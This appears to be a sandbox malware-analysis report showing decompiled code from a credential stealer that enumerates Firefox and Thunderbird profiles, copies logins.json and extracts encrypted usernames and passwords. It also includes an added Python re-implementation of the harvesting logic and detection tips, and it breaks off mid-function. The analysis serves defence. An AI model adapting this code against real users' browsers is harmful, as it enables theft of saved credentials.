                                      									_t193 =  *((intOrPtr*)(_t392 + 0x7c))(_t190, 1, _t281);
                                      									_t396 = _t396 + 0xc;
                                      									__eflags = _t193;
                                      									if(_t193 != 0) {
                                      										goto L7;
                                      									} else {
                                      										E0025345A( &_v20,  &_v12);
                                      										E00253297( &_v20, _t385, __eflags, L"\\logins.json");
                                      										_t386 = 0x1a;
                                      										E0025D75B( &_v16, _t386, __eflags);
                                      										E00253297( &_v16, _t386, __eflags, "\\");
                                      										_t385 = 8;
                                      										E00253162( &_v16, __eflags, E002532D4( &_v56, _t385, __eflags));
                                      										E00255A2D(_v56);
                                      										_v56 = _t281;
                                      										E00253297( &_v16, _t385, __eflags, L".tmp");
                                      										_t393 = _v16;
                                      										_t390 = _v20;
                                      										__eflags = CopyFileW(_v20, _t393, _t281);
                                      										if(__eflags != 0) {
                                      											E00253264( &_v20,  &_v16);
                                      											_t390 = _v20;
                                      										}
                                      										E0025DE6C( &_v184, __eflags);
                                      										_t325 =  &_v180;
                                      										E00253264(_t325,  &_v20);
                                      										_push(_t325);
                                      										_t207 = E0025E130( &_v184, 0xc0000000);
                                      										_t327 =  &_v184;
                                      										__eflags = _t207;
                                      										if(__eflags != 0) {
                                      											_v52 = _t281;
                                      											_v48 = _t281;
                                      											E0025DDDB( &_v184, _t385,  &_v52, _v164, _t281);
                                      											_t215 = E002531EC( &_v116, "encryptedUsername");
                                      											_t217 = E00252D59( &_v52,  &_v160);
                                      											_t385 = _t215;
                                      											_t283 = E00258B5D(_t217, _t215, __eflags);
                                      											_v120 = _t283;
                                      											E00255A2D(_v160);
                                      											_t336 = _v116;
                                      											E00255A2D(_v116);
                                      											__eflags = _t283;
                                      											if(_t283 == 0) {
                                      												_t281 = 0;
                                      												__eflags = 0;
                                      											} else {
                                      												_t391 = _v32;
                                      												_t281 = 0;
                                      												__eflags = 0;
                                      												_t394 = _v120;
                                      												do {
                                      													_v112 = 0;
                                      													_v108 = 0;
                                      													_v104 = 0;
                                      													_t230 = E002531EC( &_v128, "hostname");
                                      													E00258B96( &_v88, E00252D59( &_v52,  &_v124), __eflags, _t230, _t394);
                                      													E00255A2D(_v124);
                                      													E00255A2D(_v128);
                                      													_t236 = E002531EC( &_v136, "encryptedUsername");
                                      													E00258B96( &_v84, E00252D59( &_v52,  &_v132), __eflags, _t236, _t394);
                                      													E00255A2D(_v132);
                                      													E00255A2D(_v136);
                                      													_t242 = E002531EC( &_v144, "encryptedPassword");
                                      													_t385 = E00252D59( &_v52,  &_v140);
                                      													E00258B96( &_v80, _t244, __eflags, _t242, _t394);
                                      													E00255A2D(_v140);
                                      													E00255A2D(_v144);
                                      													E00259E04(_t391, __eflags, _v84,  &_v72);
                                      													E00259E04(_t391, __eflags, _v80,  &_v76);
                                      													E00253264( &_v112, E00252ECA( &_v88, __eflags,  &_v60));
                                      													E00255A2D(_v60);
                                      													_v60 = 0;
                                      													E00253264( &_v108, E00252ECA(E002531EC( &_v148, _v72), __eflags,  &_v64));
                                      													E00255A2D(_v64);
                                      													_v64 = 0;
                                      													E00255A2D(_v148);
                                      													E00253264( &_v104, E00252ECA(E002531EC( &_v152, _v76), __eflags,  &_v68));
                                      													E00255A2D(_v68);
                                      													_v68 = 0;
                                      													E00255A2D(_v152);
                                      													_t396 = _t396 - 0x10;
                                      													_v100 = 0;
                                      													E00251EB9(_t396,  &_v112);
                                      													E00251EEF(_t391);
                                      													E00255A2D(_v72);
                                      													E00255A2D(_v76);
                                      													E00255A2D(_v80);
                                      													E00255A2D(_v84);
                                      													E00255A2D(_v88);
                                      													_t336 =  &_v112;
                                      													E0025138F( &_v112);
                                      													_t394 = _t394 - 1;
                                      													__eflags = _t394;
                                      												} while (_t394 != 0);
                                      												_t393 = _v16;
                                      												_t390 = _v20;
                                      											}
                                      											_t221 = PathFileExistsW(_t393);
                                      											__eflags = _t221;
                                      											if(_t221 != 0) {
                                      												E0025345A(_t396,  &_v16);
                                      												E0025DEA9(_t336);
                                      											}
                                      											 *((intOrPtr*)(_v32 + 0x84))(_v156);
                                      											 *((intOrPtr*)(_v32 + 0x6c))();
                                      											E00252E66( &_v52);
                                      											_t327 =  &_v184;
                                      										}
                                      										E0025DE8B(_t327, __eflags);
                                      										E00255A2D(_t393);
                                      										_v16 = _t281;
                                      										E00255A2D(_t390);
                                      										_v20 = _t281;
                                      										E00255A2D(_v28);
                                      										E00255A2D(_v12);
                                      										_t389 = _v40;
                                      										_t392 = _v32;
                                      									}
                                      								}
                                      							} else {
                                      								L7:
                                      								E00255A2D(_v28);
                                      								E00255A2D(_v12);
                                      							}
                                      							_v12 = _t281;
                                      						}
                                      						E0025A64F(_t392);
                                      						_t281 = 1;
                                      						E00255A2D(_v36);
                                      					}
                                      					E00255A2D(_v44);
                                      				}
                                      				E00255A2D(_v24);
                                      				E00255A2D(_a4);
                                      				return _t281;
                                      			}
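The decompiled E002598B0 above is the Firefox credential walk: it resolves firefox.exe through the App Paths key, checks GetBinaryTypeW against 6 (SCS_64BIT_BINARY), presumably to load a matching NSS library through E0025A6A6, then reads Path from the sections Profile0, Profile1, ... of profiles.ini with GetPrivateProfileStringW until the lookup returns 0, copies each profile's logins.json to a randomly named .tmp file with CopyFileW, and pulls hostname, encryptedUsername and encryptedPassword out of every entry before decrypting them through the context structure and E00259E04. The following is an added example, not code from the sample or from Joe Sandbox: it reproduces that data flow on a constructed profiles.ini and logins.json tree so the enumeration logic can be exercised offline. The NSS decryption is not reproduced and the ciphertext strings are placeholders; `scratch_dir` stands in for whatever E0025D75B(0x1a) resolves to, and the eight-character random stem is an assumption about E002532D4(..., 8).

```python
"""Re-implementation of the Firefox profile/logins.json walk in E002598B0.

Added example, not code from the analysed sample: profiles.ini sections Profile0,
Profile1, ... are read until a Path key is missing, each profile's logins.json is
copied to a scratch *.tmp (the CopyFileW step) and the three fields the sample
extracts are pulled from every entry. Decryption is deliberately left out; the
file contents below are constructed and the ciphertext strings are placeholders.
"""
import configparser
import json
import os
import secrets
import shutil
from typing import Dict, List

PROFILES_INI = """[General]
StartWithLastProfile=1

[Profile0]
Name=default
IsRelative=1
Path=Profiles/abcd1234.default
Default=1

[Profile1]
Name=work
IsRelative=1
Path=Profiles/ef567890.work
"""

LOGINS_BY_PROFILE = {
    "Profiles/abcd1234.default": {"nextId": 3, "logins": [
        {"id": 1, "hostname": "https://example.test",
         "encryptedUsername": "PLACEHOLDER-U1", "encryptedPassword": "PLACEHOLDER-P1"},
        {"id": 2, "hostname": "https://mail.example.test",
         "encryptedUsername": "PLACEHOLDER-U2", "encryptedPassword": "PLACEHOLDER-P2"},
    ]},
    "Profiles/ef567890.work": {"nextId": 2, "logins": [
        {"id": 1, "hostname": "https://intranet.example.test",
         "encryptedUsername": "PLACEHOLDER-U3", "encryptedPassword": "PLACEHOLDER-P3"},
    ]},
}


def enumerate_profile_paths(ini_text: str) -> List[str]:
    """Profile0, Profile1, ... stopping at the first section without a non-empty
    Path, which is when GetPrivateProfileStringW returns 0 in the sample."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(ini_text)
    paths: List[str] = []
    i = 0
    while True:
        path = cp.get(f"Profile{i}", "Path", fallback="")
        if not path:
            break
        paths.append(path)
        i += 1
    return paths


def extract_logins(logins_json_path: str) -> List[Dict[str, str]]:
    """The three fields the sample reads from every entry of the 'logins' array."""
    with open(logins_json_path, "r", encoding="utf-8") as fh:
        doc = json.load(fh)
    keys = ("hostname", "encryptedUsername", "encryptedPassword")
    return [{k: e[k] for k in keys} for e in doc.get("logins", []) if all(k in e for k in keys)]


def copy_like_sample(src: str, scratch_dir: str) -> str:
    """Copy logins.json to <scratch>/<random>.tmp before reading it, as the sample
    does; the eight-character random stem is an assumption."""
    dst = os.path.join(scratch_dir, secrets.token_hex(4) + ".tmp")
    shutil.copyfile(src, dst)
    return dst


def harvest_firefox(firefox_root: str, scratch_dir: str) -> List[Dict[str, str]]:
    """profiles.ini -> profile dir -> scratch copy of logins.json -> entries."""
    with open(os.path.join(firefox_root, "profiles.ini"), "r", encoding="utf-8") as fh:
        ini_text = fh.read()
    found: List[Dict[str, str]] = []
    for rel in enumerate_profile_paths(ini_text):
        logins = os.path.join(firefox_root, os.path.normpath(rel), "logins.json")
        if not os.path.isfile(logins):
            continue  # profile without saved logins
        tmp = copy_like_sample(logins, scratch_dir)
        try:
            for entry in extract_logins(tmp):
                entry["profile"] = rel
                found.append(entry)
        finally:
            os.remove(tmp)  # clean up the scratch copy
    return found


def build_sample_tree(root: str) -> str:
    """Write the constructed profiles.ini and logins.json files under root/Mozilla/Firefox."""
    firefox_root = os.path.join(root, "Mozilla", "Firefox")
    os.makedirs(firefox_root, exist_ok=True)
    with open(os.path.join(firefox_root, "profiles.ini"), "w", encoding="utf-8") as fh:
        fh.write(PROFILES_INI)
    for rel, doc in LOGINS_BY_PROFILE.items():
        pdir = os.path.join(firefox_root, os.path.normpath(rel))
        os.makedirs(pdir, exist_ok=True)
        with open(os.path.join(pdir, "logins.json"), "w", encoding="utf-8") as fh:
            json.dump(doc, fh)
    return firefox_root


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as td:
        for rec in harvest_firefox(build_sample_tree(td), td):
            print(rec)
```

Two points worth carrying into detection from this flow: a profile whose numbering has a gap after Profile0 is never visited, because the loop stops at the first missing Path rather than iterating every section; and the only file-system footprint before decryption is a non-Firefox process creating a short-lived .tmp copy of logins.json, which is a more specific thing to alert on than reads of the profile directory itself.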
(instruction address column for E002598B0, 0x002598b0 .. 0x00259e01, one address per decompiled line; the per-line alignment did not survive extraction)

                                      APIs
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 0025ADBE: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0025ADFA
                                        • Part of subcall function 0025ADBE: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0025AE08
                                        • Part of subcall function 0025ADBE: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,002593CF,?,00000104,00000000), ref: 0025AE21
                                        • Part of subcall function 0025ADBE: RegQueryValueExW.ADVAPI32(002593CF,Path,00000000,?,?,?,?,00000104,00000000), ref: 0025AE3E
                                        • Part of subcall function 0025ADBE: RegCloseKey.ADVAPI32(002593CF,?,00000104,00000000), ref: 0025AE47
                                      • lstrcatW.KERNEL32(?,\firefox.exe), ref: 00259932
                                      • GetBinaryTypeW.KERNEL32(?,?), ref: 00259943
                                      • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 00259DC3
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                        • Part of subcall function 0025309F: wsprintfW.USER32 ref: 002530BA
                                        • Part of subcall function 0025345A: lstrcpyW.KERNEL32(00000000,?), ref: 00253484
                                        • Part of subcall function 00253381: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00254AC0,?), ref: 002533AE
                                        • Part of subcall function 00253381: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00254AC0,?,?,?,?,?), ref: 002533D9
                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 00259ABA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ByteCharMultiWidelstrcatlstrlen$BinaryCloseCopyFileFreeOpenPrivateProfileQueryStringTypeValueVirtualwsprintf
                                      • String ID: .tmp$Path$Profile$\Mozilla\Firefox\$\firefox.exe$\logins.json$encryptedPassword$encryptedUsername$firefox.exe$hostname$profiles.ini
                                      • API String ID: 288196626-815594582
                                      • Opcode ID: ef592556e462bc40670561ee594be43bc04a5cd2c78c8ab641f1b63ab1b6b267
                                      • Instruction ID: 69640ea2bef286e953319be3ba0a30ae43cdcda0daa51e678d817aef00bcec6c
                                      • Opcode Fuzzy Hash: ef592556e462bc40670561ee594be43bc04a5cd2c78c8ab641f1b63ab1b6b267
                                      • Instruction Fuzzy Hash: 8AE12E71920519DBCF14EBA0DC929EEB779AF04302F104169E916B7192EF30AE6DCF58
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 94%
                                      			E0025936E(intOrPtr __ecx, void* __eflags, char _a4) {
                                      				int _v12;
                                      				int _v16;
                                      				WCHAR* _v20;
                                      				WCHAR* _v24;
                                      				char _v28;
                                      				intOrPtr _v32;
                                      				char _v36;
                                      				char _v40;
                                      				char _v44;
                                      				int _v48;
                                      				int _v52;
                                      				long _v56;
                                      				int _v60;
                                      				int _v64;
                                      				char _v68;
                                      				char _v72;
                                      				char _v76;
                                      				char _v80;
                                      				char _v84;
                                      				intOrPtr _v88;
                                      				char _v92;
                                      				char _v96;
                                      				char _v100;
                                      				void* _v104;
                                      				int _v108;
                                      				char _v112;
                                      				char _v116;
                                      				char _v120;
                                      				char _v124;
                                      				char _v128;
                                      				char _v132;
                                      				char _v136;
                                      				char _v140;
                                      				char _v144;
                                      				char _v148;
                                      				int _v152;
                                      				long _v156;
                                      				char _v160;
                                      				intOrPtr _v164;
                                      				char _v180;
                                      				char _v184;
                                      				short _v704;
                                      				short _v1224;
                                      				long _t171;
                                      				int _t182;
                                      				int _t183;
                                      				int _t186;
                                      				int _t200;
                                      				WCHAR* _t208;
                                      				void* _t210;
                                      				int _t214;
                                      				void* _t223;
                                      				void* _t229;
                                      				void* _t235;
                                      				int _t279;
                                      				int _t281;
                                      				char* _t321;
                                      				void* _t382;
                                      				intOrPtr _t385;
                                      				intOrPtr _t387;
                                      				WCHAR* _t392;
                                      				int _t393;
                                      				void* _t394;
                                      				void* _t395;
                                      				void* _t396;
                                      
                                      				_t396 = __eflags;
                                      				_t385 = __ecx;
                                      				_v32 = __ecx;
                                      				E00253412( &_v24, L"Profile");
                                      				_t279 = 0;
                                      				E00251052( &_v1224, 0, 0x208);
                                      				_v56 = 0;
                                      				_v156 = 0;
                                      				E00251052( &_v704, 0, 0x104);
                                      				_t395 = _t394 + 0x14;
                                      				_t381 =  &_v704;
                                      				E0025ADBE(L"thunderbird.exe",  &_v704, _t396);
                                      				E00253412( &_v44,  &_v704);
                                      				GetBinaryTypeW( &_v704,  &_v156);
                                      				E0025345A(_t395,  &_v44);
                                      				_t289 = _t385;
                                      				if(E0025A324(_t385,  &_v704,  &_v44) != 0) {
                                      					L3:
                                      					E00253297( &_a4, _t381, __eflags, L"\\Thunderbird\\");
                                      					E0025345A( &_v36,  &_a4);
                                      					E00253297( &_v36, _t381, __eflags, L"profiles.ini");
                                      					E00253264( &_v24, E00253412( &_v40, L"Profile"));
                                      					E00255A2D(_v40);
                                      					E0025309F( &_v24, _t381, __eflags, _t279);
                                      					_push(_v36);
                                      					_push(0x104);
                                      					while(1) {
                                      						_t389 = _v24;
                                      						_t171 = GetPrivateProfileStringW(_v24, L"Path", _t279,  &_v1224, ??, ??);
                                      						__eflags = _t171;
                                      						if(_t171 == 0) {
                                      							break;
                                      						}
                                      						_v56 = _v56 + 1;
                                      						E00253264( &_v24, E00253412( &_v60, L"Profile"));
                                      						E00255A2D(_v60);
                                      						_v60 = _t279;
                                      						E0025309F( &_v24, _t381, __eflags, _v56 + 1);
                                      						E0025345A( &_v12,  &_a4);
                                      						E00253297( &_v12, _t381, __eflags,  &_v1224);
                                      						E00253381( &_v12,  &_v28);
                                      						_t182 =  *((intOrPtr*)(_t385 + 0x68))(_v28);
                                      						__eflags = _t182;
                                      						if(_t182 == 0) {
                                      							_t183 =  *((intOrPtr*)(_t385 + 0x80))();
                                      							_v152 = _t183;
                                      							__eflags = _t183;
                                      							if(_t183 == 0) {
                                      								goto L5;
                                      							} else {
                                      								_t186 =  *((intOrPtr*)(_t385 + 0x7c))(_t183, 1, _t279);
                                      								_t395 = _t395 + 0xc;
                                      								__eflags = _t186;
                                      								if(_t186 != 0) {
                                      									goto L5;
                                      								} else {
                                      									E0025345A( &_v20,  &_v12);
                                      									E00253297( &_v20, _t381, __eflags, L"\\logins.json");
                                      									_t382 = 0x1a;
                                      									E0025D75B( &_v16, _t382, __eflags);
                                      									E00253297( &_v16, _t382, __eflags, "\\");
                                      									_t381 = 8;
                                      									E00253162( &_v16, __eflags, E002532D4( &_v64, _t381, __eflags));
                                      									E00255A2D(_v64);
                                      									_v64 = _t279;
                                      									E00253297( &_v16, _t381, __eflags, L".tmp");
                                      									_t392 = _v16;
                                      									_t386 = _v20;
                                      									__eflags = CopyFileW(_v20, _t392, _t279);
                                      									if(__eflags != 0) {
                                      										E00253264( &_v20,  &_v16);
                                      										_t386 = _v20;
                                      									}
                                      									E0025DE6C( &_v184, __eflags);
                                      									_t321 =  &_v180;
                                      									E00253264(_t321,  &_v20);
                                      									_push(_t321);
                                      									_t200 = E0025E130( &_v184, 0xc0000000);
                                      									_t323 =  &_v184;
                                      									__eflags = _t200;
                                      									if(__eflags != 0) {
                                      										_v52 = _t279;
                                      										_v48 = _t279;
                                      										E0025DDDB( &_v184, _t381,  &_v52, _v164, _t279);
                                      										_t208 = E002531EC( &_v104, "encryptedUsername");
                                      										_t210 = E00252D59( &_v52,  &_v160);
                                      										_t381 = _t208;
                                      										_t281 = E00258B5D(_t210, _t208, __eflags);
                                      										_v108 = _t281;
                                      										E00255A2D(_v160);
                                      										_t332 = _v104;
                                      										E00255A2D(_v104);
                                      										__eflags = _t281;
                                      										if(_t281 == 0) {
                                      											_t279 = 0;
                                      											__eflags = 0;
                                      										} else {
                                      											_t387 = _v32;
                                      											_t279 = 0;
                                      											__eflags = 0;
                                      											_t393 = _v108;
                                      											do {
                                      												_v100 = 0;
                                      												_v96 = 0;
                                      												_v92 = 0;
                                      												_t223 = E002531EC( &_v116, "hostname");
                                      												E00258B96( &_v40, E00252D59( &_v52,  &_v112), __eflags, _t223, _t393);
                                      												E00255A2D(_v112);
                                      												E00255A2D(_v116);
                                      												_t229 = E002531EC( &_v124, "encryptedUsername");
                                      												E00258B96( &_v84, E00252D59( &_v52,  &_v120), __eflags, _t229, _t393);
                                      												E00255A2D(_v120);
                                      												E00255A2D(_v124);
                                      												_t235 = E002531EC( &_v132, "encryptedPassword");
                                      												_t381 = E00252D59( &_v52,  &_v128);
                                      												E00258B96( &_v80, _t237, __eflags, _t235, _t393);
                                      												E00255A2D(_v128);
                                      												E00255A2D(_v132);
                                      												E00259E04(_t387, __eflags, _v84,  &_v136);
                                      												E00259E04(_t387, __eflags, _v80,  &_v144);
                                      												E00253264( &_v100, E00252ECA( &_v40, __eflags,  &_v68));
                                      												E00255A2D(_v68);
                                      												_v68 = 0;
                                      												E00253264( &_v96, E00252ECA(E002531EC( &_v140, _v136), __eflags,  &_v72));
                                      												E00255A2D(_v72);
                                      												_v72 = 0;
                                      												E00255A2D(_v140);
                                      												E00253264( &_v92, E00252ECA(E002531EC( &_v148, _v144), __eflags,  &_v76));
                                      												E00255A2D(_v76);
                                      												_v76 = 0;
                                      												E00255A2D(_v148);
                                      												_t395 = _t395 - 0x10;
                                      												_v88 = 4;
                                      												E00251EB9(_t395,  &_v100);
                                      												E00251EEF(_t387);
                                      												E00255A2D(_v80);
                                      												E00255A2D(_v84);
                                      												E00255A2D(_v40);
                                      												_t332 =  &_v100;
                                      												E0025138F( &_v100);
                                      												_t393 = _t393 - 1;
                                      												__eflags = _t393;
                                      											} while (_t393 != 0);
                                      											_t392 = _v16;
                                      											_t386 = _v20;
                                      										}
                                      										_t214 = PathFileExistsW(_t392);
                                      										__eflags = _t214;
                                      										if(_t214 != 0) {
                                      											E0025345A(_t395,  &_v16);
                                      											E0025DEA9(_t332);
                                      										}
                                      										 *((intOrPtr*)(_v32 + 0x84))(_v152);
                                      										 *((intOrPtr*)(_v32 + 0x6c))();
                                      										E00252E66( &_v52);
                                      										_t323 =  &_v184;
                                      									}
                                      									E0025DE8B(_t323, __eflags);
                                      									E00255A2D(_t392);
                                      									_v16 = _t279;
                                      									E00255A2D(_t386);
                                      									_v20 = _t279;
                                      									E00255A2D(_v28);
                                      									E00255A2D(_v12);
                                      									_t385 = _v32;
                                      								}
                                      							}
                                      						} else {
                                      							L5:
                                      							E00255A2D(_v28);
                                      							E00255A2D(_v12);
                                      						}
                                      						_push(_v36);
                                      						_v12 = _t279;
                                      						_push(0x104);
                                      					}
                                      					E0025A2CD(_t385);
                                      					_t279 = 1;
                                      					__eflags = 1;
                                      					E00255A2D(_v36);
                                      				} else {
                                      					E0025345A(_t395,  &_v44);
                                      					if(E0025A324(_t385,  &_v704, _t289) != 0) {
                                      						goto L3;
                                      					} else {
                                      						_t389 = _v24;
                                      					}
                                      				}
                                      				E00255A2D(_v44);
                                      				E00255A2D(_t389);
                                      				E00255A2D(_a4);
                                      				return _t279;
                                      			}

                                      APIs
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 0025ADBE: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0025ADFA
                                        • Part of subcall function 0025ADBE: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0025AE08
                                        • Part of subcall function 0025ADBE: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,002593CF,?,00000104,00000000), ref: 0025AE21
                                        • Part of subcall function 0025ADBE: RegQueryValueExW.ADVAPI32(002593CF,Path,00000000,?,?,?,?,00000104,00000000), ref: 0025AE3E
                                        • Part of subcall function 0025ADBE: RegCloseKey.ADVAPI32(002593CF,?,00000104,00000000), ref: 0025AE47
                                      • GetBinaryTypeW.KERNEL32(?,?), ref: 002593ED
                                        • Part of subcall function 0025345A: lstrcpyW.KERNEL32(00000000,?), ref: 00253484
                                        • Part of subcall function 0025A324: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0025A352
                                        • Part of subcall function 0025A324: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0025A35B
                                        • Part of subcall function 0025A324: PathFileExistsW.SHLWAPI(00259406), ref: 0025A449
                                      • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 00259870
                                        • Part of subcall function 0025A324: PathFileExistsW.SHLWAPI(00259406), ref: 0025A4A5
                                        • Part of subcall function 0025A324: LoadLibraryW.KERNEL32(?), ref: 0025A4E4
                                        • Part of subcall function 0025A324: LoadLibraryW.KERNEL32(?), ref: 0025A4EF
                                        • Part of subcall function 0025A324: LoadLibraryW.KERNEL32(?), ref: 0025A4FA
                                        • Part of subcall function 0025A324: LoadLibraryW.KERNEL32(?), ref: 0025A505
                                        • Part of subcall function 0025A324: LoadLibraryW.KERNEL32(?), ref: 0025A510
                                        • Part of subcall function 0025A324: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0025A5FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad$CurrentDirectorylstrcpy$ExistsFilePathlstrlen$BinaryCloseOpenPrivateProfileQueryStringTypeValuelstrcat
                                      • String ID: .tmp$Path$Profile$\Thunderbird\$\logins.json$encryptedPassword$encryptedUsername$hostname$profiles.ini$thunderbird.exe
                                      • API String ID: 1065485167-1863067114
                                      • Opcode ID: 8b9a37aee03fc5781b4f2b9d21a62d5b4559e164b9fb449e704c55328005a4ee
                                      • Instruction ID: df5f71c74965be21c75bed4a31c0d121674dc8a7e3cb7533ede2793f406a921e
                                      • Opcode Fuzzy Hash: 8b9a37aee03fc5781b4f2b9d21a62d5b4559e164b9fb449e704c55328005a4ee
                                      • Instruction Fuzzy Hash: 08E13D71D205189BCF15EBA0DC929EEB779AF04302F104169E916B7192EF30AE6DCF54
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E0025B889(short** _a4) {
                                      				void* _t2;
                                      				int _t8;
                                      				void* _t13;
                                      				int _t15;
                                      				void* _t17;
                                      
                                      				_t15 = 0;
                                      				_t2 = OpenSCManagerW(0, L"ServicesActive", 1);
                                      				_t17 = _t2;
                                      				if(_t17 != 0) {
                                      					_t13 = OpenServiceW(_t17,  *_a4, 0x10);
                                      					if(_t13 != 0) {
                                      						if(StartServiceW(_t13, 0, 0) != 0) {
                                      							L6:
                                      							_t15 = 1;
                                      							L7:
                                      							CloseServiceHandle(_t17);
                                      							CloseServiceHandle(_t13);
                                      							_t8 = _t15;
                                      							L8:
                                      							return _t8;
                                      						}
                                      						if(GetLastError() != 0x420) {
                                      							goto L7;
                                      						}
                                      						Sleep(0x7d0);
                                      						if(StartServiceW(_t13, 0, 0) == 0) {
                                      							goto L7;
                                      						}
                                      						goto L6;
                                      					}
                                      					CloseServiceHandle(_t17);
                                      					_t8 = 0;
                                      					goto L8;
                                      				}
                                      				return _t2;
                                      			}

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0025B898
                                      • OpenServiceW.ADVAPI32(00000000,?,00000010), ref: 0025B8AD
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025B8BA
                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0025B8C7
                                      • GetLastError.KERNEL32 ref: 0025B8D1
                                      • Sleep.KERNEL32(000007D0), ref: 0025B8E3
                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0025B8EC
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025B900
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025B903
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$OpenStart$ErrorLastManagerSleep
                                      • String ID: ServicesActive
                                      • API String ID: 104619213-3071072050
                                      • Opcode ID: e4e656074cca0ebf14f99db79e537377bc2a5b7e2c9c0631aed58a810af93f77
                                      • Instruction ID: 1d542f88cd5da647dd5c71bfc269cfb31e6196126f0b49ba23fa9b48d36a8f1b
                                      • Opcode Fuzzy Hash: e4e656074cca0ebf14f99db79e537377bc2a5b7e2c9c0631aed58a810af93f77
                                      • Instruction Fuzzy Hash: 3401A271311616FBD3221F66BD8CE6B3E6CDFD6B62B009021FA05D6150DBB4C818CAB4
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 89%
                                      			E0025BDDC(intOrPtr __ecx) {
                                      				char _v8;
                                      				signed int _v12;
                                      				char _v16;
                                      				char _v20;
                                      				short* _v24;
                                      				signed int _v28;
                                      				short** _v32;
                                      				short* _v36;
                                      				signed int _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr* _t66;
                                      				char* _t69;
                                      				void* _t90;
                                      				intOrPtr* _t91;
                                      				intOrPtr _t92;
                                      				intOrPtr _t105;
                                      				intOrPtr* _t112;
                                      				intOrPtr _t113;
                                      				char _t114;
                                      				signed int _t115;
                                      				signed int _t116;
                                      				void* _t117;
                                      				void* _t119;
                                      
                                      				_t113 = __ecx;
                                      				_v44 = __ecx;
                                      				_v20 = 0;
                                      				_v16 = 0;
                                      				_v8 = 0;
                                      				_v24 = 0;
                                      				_v36 = 0;
                                      				_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
                                      				if(_t90 == 0) {
                                      					L9:
                                      					_v40 = _v40 & 0x00000000;
                                      					L10:
                                      					E00255A2D(_v24);
                                      					return _v40;
                                      				}
                                      				_v40 = 1;
                                      				_v32 = _t113 + 0x28;
                                      				while(1) {
                                      					L2:
                                      					_v16 = 0;
